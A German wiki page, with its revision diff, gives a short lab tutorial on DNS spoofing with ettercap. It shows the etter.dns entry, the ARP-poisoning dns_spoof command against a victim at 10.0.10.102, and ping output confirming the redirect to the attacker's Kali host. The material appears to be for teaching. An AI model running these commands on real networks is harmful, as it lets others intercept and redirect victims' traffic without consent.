Dnspoof mit ettercap plugin: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „==Packet== *apt-get install ettercap ==host anlegen== *echo -e "www.xinux.de A 192.168.244.50" > /etc/ettercap/etter.dns ==ettercap mit dns plugin starten== …“)
 
 
(21 dazwischenliegende Versionen von 2 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
 
==Packet==
 
==Packet==
*apt-get install ettercap
+
*apt-get install ettercap-graphical
 +
=OPFER=
 +
*host -4 xinux.de
 +
xinux.de has address 94.130.248.215
  
 +
=Angreifer=
 
==host anlegen==
 
==host anlegen==
*echo -e "www.xinux.de A 192.168.244.50" > /etc/ettercap/etter.dns
+
*echo -e "xinux.de A 10.0.10.101" > /etc/ettercap/etter.dns
  
 
==ettercap mit dns plugin starten==
 
==ettercap mit dns plugin starten==
*ettercap -Tq -i eth0 -M arp -P dns_spoof /192.168.244.26,192.168.240.200// /192.168.240.200,192.168.244.26//
+
*OPFER=10.0.10.102
 +
*ANGREIFER=10.0.10.101
 +
*ettercap -Tq -i eth0 -M arp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER//
  
 
+
=OPFER=
  Opfer      192.168.244.26
+
*ping xinux.de
  Nameserver 192.168.240.200
+
PING www.xinux.de (10.0.10.101) 56(84) bytes of data.
 +
64 bytes from kali.secure.local (10.0.10.101): icmp_seq=1 ttl=64 time=0.444 ms
 +
  64 bytes from kali.secure.local (10.0.10.101): icmp_seq=2 ttl=64 time=0.395 ms
 +
  64 bytes from kali.secure.local (10.0.10.101): icmp_seq=3 ttl=64 time=0.263 ms

Aktuelle Version vom 10. April 2024, 07:04 Uhr

Packet

  • apt-get install ettercap-graphical

OPFER

  • host -4 xinux.de
xinux.de has address 94.130.248.215

Angreifer

host anlegen

  • echo -e "xinux.de A 10.0.10.101" > /etc/ettercap/etter.dns

ettercap mit dns plugin starten

  • OPFER=10.0.10.102
  • ANGREIFER=10.0.10.101
  • ettercap -Tq -i eth0 -M arp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER//

OPFER

  • ping xinux.de
PING www.xinux.de (10.0.10.101) 56(84) bytes of data.
64 bytes from kali.secure.local (10.0.10.101): icmp_seq=1 ttl=64 time=0.444 ms
64 bytes from kali.secure.local (10.0.10.101): icmp_seq=2 ttl=64 time=0.395 ms
64 bytes from kali.secure.local (10.0.10.101): icmp_seq=3 ttl=64 time=0.263 ms